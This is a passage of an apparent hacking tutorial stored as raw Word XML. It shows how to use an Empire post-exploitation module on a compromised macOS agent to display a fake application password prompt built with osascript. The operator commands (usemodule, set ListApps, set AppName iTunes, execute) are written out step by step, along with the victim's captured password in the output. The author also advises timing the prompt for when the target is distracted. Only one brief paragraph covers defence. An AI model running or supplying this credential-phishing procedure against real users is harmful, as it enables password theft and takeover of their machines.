        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usemodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Then, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to view the modules available options.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P98MAEE0) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usemodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>info</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Name: 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Module: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NeedsAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: False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OpsecSafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: False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Language: python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98489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MinLanguageVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: 2.6</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Background: False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OutputExtension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: None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Authors: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FuzzyNop</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@harmj0y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Description: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Launches a specified application with an prompt for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gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>osascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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Comments: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https://github.com/fuzzynop/FiveOnceInYourLife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Options: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Name        Required    Value                     Description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    -------                   -----------</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ListApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    False                                 Switch. List applications suitable for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gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>launching</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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SandboxMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> False                                 Switch. Launch a sandbox safe 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Agent       True        P98MAEE0                  Agent to execute module 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AppName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     True        Google Chrome             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name of the application to launch.</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4 Get a List of Installed Applications</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ListApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> option will return a list of applications installed on the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 Set the value to "true," then </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module.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set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ListApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> true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execute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[&gt;] Module is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>opsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> safe, run? [y/N] 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P98MAEE0 to run TASK_CMD_WAIT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Agent P98MAEE0 tasked with task ID 1</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agent P98MAEE0 to run module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 Agent P98MAEE0 returned results.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lastRenderedPageBreak/>
        <w:t>Available applications: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 DVD Player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 Siri</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 QuickTime Player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[4] Chess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[5] Photo Booth</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[6] Notes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[7] Image Capture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[8] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iBooks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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[9] Google Chrome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[10] Preview</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[11] Dashboard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[12] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TextEdit</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[13] Mail</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[14] Safari</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[15] Dictionary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[16] Contacts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[17] Time Machine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[18] Utilities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[19] Font Book</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[20] FaceTime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[21] Maps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[22] Mission Control</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[23] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stickies</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[24] Photos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[25] Messages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[26] Calculator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[27] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iTunes</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[28] Firefox</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[29] Launchpad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[30] Reminders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[31] App Store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[32] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Automator</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[33] Calendar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[34] System Preferences</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Before selecting an application, </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unset</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ListApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> value so that the module doesn't continuously return the list of applications.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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unset</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ListApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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By default, there are many suitable applications for this attack.</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5 Select an Appl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>cation &amp; Execute the Attack</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">To select an application, </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AppName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" value to the application name. In my below example, I'm using iTunes. Punctuation is important here. Notice the capital "T" in iTunes. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AppName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> value must appear exactly as it does in the above list of apps.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set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AppName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iTunes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execute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[&gt;] Module is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>opsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> safe, run? [y/N] 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P98MAEE0 to run TASK_CMD_WAIT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Agent P98MAEE0 tasked with task ID 2</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agent P98MAEE0 to run module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After a few seconds, the target user will be prompted with a password request from the application of your choosing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098489A" w:rsidRPr="0098489A" w:rsidRDefault="0098489A" w:rsidP="0098489A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5449824" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/61/14/63668865329556/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1/14/63668865329556/0/hacking-macos-perform-privilege-escalation-part-2-password-phishing.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824" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Upon submitting their password, the Empire terminal will display the following results.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 Agent P98MAEE0 returned results.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button</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returned:OK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, text returned: super-secret-password-54321</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If triggered while the target user is browsing iTunes media or while heavily occupied with work, they may not hesitate to enter their password to get rid of that annoying prompt.</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Defending Against Backdoor Attacks</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Defending against such attacks is difficult. </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Antivirus software</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can usually be evaded with </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>a few simple tricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it's not a very reliable defense solution. If you experience random password prompts or your MacBook fans seem to heat up unexpectedly, it could be a sign that your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 has been compromised. In my next article, I'll talk about a few strategies to identify backdoors on your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devices ... so stay tuned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C623C" w:rsidRPr="0098489A" w:rsidRDefault="002C623C" w:rsidP="0098489A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C623C" w:rsidRPr="0098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1285F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="198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B4ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="946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A342A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC2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2729F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="292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993"/>
    <w:rsid w:val="002C623C"/>
    <w:rsid w:val="00393FBD"/>
    <w:rsid w:val="00860993"/>
    <w:rsid w:val="0098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7D4D1-B672-43F2-B04A-3679C58D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48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89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489A"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="series">
    <w:name w:val="series"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0098489A"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0098489A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009848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8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489A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="margin-label">
    <w:name w:val="margin-label"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0098489A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="centered-article-content">
    <w:name w:val="centered-article-content"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0098489A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment-score">
    <w:name w:val="comment-score"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0098489A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text">
    <w:name w:val="text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0098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928276">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="885750437">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="732243401">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="504902090">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
